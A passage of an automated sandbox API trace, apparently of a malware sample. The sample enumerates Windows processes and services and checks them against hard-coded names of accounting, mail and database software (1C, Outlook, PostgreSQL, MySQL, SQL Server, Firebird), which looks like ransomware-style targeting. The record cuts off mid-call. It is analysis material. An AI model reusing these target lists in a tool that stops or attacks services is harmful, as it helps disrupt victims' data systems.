th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.229] lstrlenW (lpString="svchost.exe") returned 11 [0262.229] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0262.229] lstrlenW (lpString="agent1c.exe") returned 11 [0262.229] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0262.229] lstrlenW (lpString="spoolsv.exe") returned 11 [0262.229] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0262.230] lstrlenW (lpString="reader_sl.exe") returned 13 [0262.230] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0262.230] lstrlenW (lpString="dllhost.exe") returned 11 [0262.230] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0262.230] lstrlenW (lpString="taskhost.exe") returned 12 [0262.230] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.231] lstrlenW (lpString="svchost.exe") returned 11 [0262.231] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0262.231] lstrlenW (lpString="cmd.exe") returned 7 [0262.231] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x628, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0262.231] lstrlenW (lpString="conhost.exe") returned 11 [0262.231] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x628, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0262.232] CloseHandle (hObject=0x128) returned 1 [0262.232] Sleep (dwMilliseconds=0x1f4) [0263.038] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4d9e18 [0263.311] EnumServicesStatusExW (in: hSCManager=0x4d9e18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 0 [0263.312] GetLastError () returned 0xea [0263.312] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa08) returned 0x565e68 [0263.312] EnumServicesStatusExW (in: hSCManager=0x4d9e18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x565e68, cbBufSize=0xa08, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x565e68, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 1 [0263.312] CloseServiceHandle (hSCObject=0x4d9e18) returned 1 [0263.312] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0263.312] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0263.312] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0263.312] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0263.312] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0263.312] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0263.312] lstrlenW (lpString="AudioSrv") returned 8 [0263.312] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0263.312] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0263.312] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0263.312] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0263.312] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0263.312] lstrlenW (lpString="BFE") returned 3 [0263.312] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0263.313] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0263.313] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0263.313] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0263.313] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0263.313] lstrlenW (lpString="CscService") returned 10 [0263.313] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0263.313] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0263.313] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0263.313] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0263.313] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0263.313] lstrlenW (lpString="DcomLaunch") returned 10 [0263.313] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0263.313] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0263.313] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0263.313] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0263.313] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0263.313] lstrlenW (lpString="Dhcp") returned 4 [0263.313] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0263.313] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0263.313] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0263.313] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0263.313] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0263.313] lstrlenW (lpString="Dnscache") returned 8 [0263.313] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0263.313] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0263.313] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0263.313] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0263.313] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0263.313] lstrlenW (lpString="eventlog") returned 8 [0263.313] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0263.313] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0263.313] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0263.313] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0263.313] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0263.314] lstrlenW (lpString="EventSystem") returned 11 [0263.314] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0263.314] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0263.314] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0263.314] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0263.314] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0263.314] lstrlenW (lpString="gpsvc") returned 5 [0263.314] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0263.314] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0263.314] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0263.314] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0263.314] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0263.314] lstrlenW (lpString="lmhosts") returned 7 [0263.314] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0263.314] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0263.314] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0263.314] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0263.314] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0263.314] lstrlenW (lpString="MMCSS") returned 5 [0263.314] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0263.314] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0263.314] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0263.314] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0263.314] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0263.314] lstrlenW (lpString="nsi") returned 3 [0263.314] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0263.314] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0263.314] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0263.314] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0263.314] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0263.314] lstrlenW (lpString="PlugPlay") returned 8 [0263.314] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0263.314] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0263.314] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0263.315] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0263.315] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0263.315] lstrlenW (lpString="Power") returned 5 [0263.315] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0263.315] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0263.315] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0263.315] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0263.315] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0263.315] lstrlenW (lpString="ProfSvc") returned 7 [0263.315] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0263.315] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0263.315] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0263.315] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0263.315] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0263.315] lstrlenW (lpString="RpcEptMapper") returned 12 [0263.315] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0263.315] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0263.315] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0263.315] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0263.315] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0263.315] lstrlenW (lpString="RpcSs") returned 5 [0263.315] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0263.315] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0263.315] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0263.315] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0263.315] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0263.315] lstrlenW (lpString="SamSs") returned 5 [0263.315] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0263.315] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0263.315] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0263.315] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0263.315] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0263.315] lstrlenW (lpString="Schedule") returned 8 [0263.315] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0263.316] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0263.316] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0263.316] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0263.316] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0263.316] lstrlenW (lpString="SENS") returned 4 [0263.316] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0263.316] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0263.316] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0263.316] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0263.316] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0263.316] lstrlenW (lpString="ShellHWDetection") returned 16 [0263.316] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0263.316] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0263.316] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0263.316] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0263.316] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0263.316] lstrlenW (lpString="Spooler") returned 7 [0263.316] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0263.316] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0263.316] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0263.316] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0263.316] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0263.316] lstrlenW (lpString="Themes") returned 6 [0263.316] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0263.316] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0263.316] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0263.316] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0263.316] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0263.316] lstrlenW (lpString="UxSms") returned 5 [0263.316] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0263.316] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0263.316] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0263.316] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0263.316] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0263.317] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x565e68 | out: hHeap=0x4a0000) returned 1 [0263.317] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x134 [0263.318] Process32FirstW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.318] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x48, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0263.319] lstrlenW (lpString="System") returned 6 [0263.319] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0263.319] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0263.319] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0263.319] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0263.319] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0263.319] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0263.319] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0263.319] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0263.319] lstrlenW (lpString="smss.exe") returned 8 [0263.319] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0263.319] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0263.319] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0263.319] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0263.319] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0263.319] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0263.319] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0263.319] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0263.320] lstrlenW (lpString="csrss.exe") returned 9 [0263.320] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0263.320] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0263.320] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0263.320] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0263.320] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0263.320] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0263.320] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0263.320] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0263.320] lstrlenW (lpString="wininit.exe") returned 11 [0263.320] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0263.320] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0263.320] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0263.321] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0263.321] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0263.321] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0263.321] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0263.321] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0263.321] lstrlenW (lpString="csrss.exe") returned 9 [0263.321] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0263.321] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0263.321] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0263.321] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0263.321] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0263.321] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0263.321] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0263.321] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0263.321] lstrlenW (lpString="winlogon.exe") returned 12 [0263.321] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0263.321] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0263.322] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0263.322] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0263.322] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0263.322] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0263.322] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0263.322] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0263.322] lstrlenW (lpString="services.exe") returned 12 [0263.322] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0263.322] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0263.322] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0263.322] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0263.322] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0263.322] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0263.322] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0263.322] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0263.322] lstrlenW (lpString="lsass.exe") returned 9 [0263.322] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0263.322] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0263.322] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0263.323] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0263.323] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0263.323] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0263.323] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0263.323] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0263.323] lstrlenW (lpString="lsm.exe") returned 7 [0263.323] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0263.323] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0263.323] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0263.323] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0263.323] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0263.323] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0263.323] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0263.323] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.323] lstrlenW (lpString="svchost.exe") returned 11 [0263.323] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0263.323] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0263.323] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0263.324] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0263.324] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0263.324] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0263.324] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0263.324] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.324] lstrlenW (lpString="svchost.exe") returned 11 [0263.324] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0263.324] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0263.324] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0263.324] lstrcmpiW 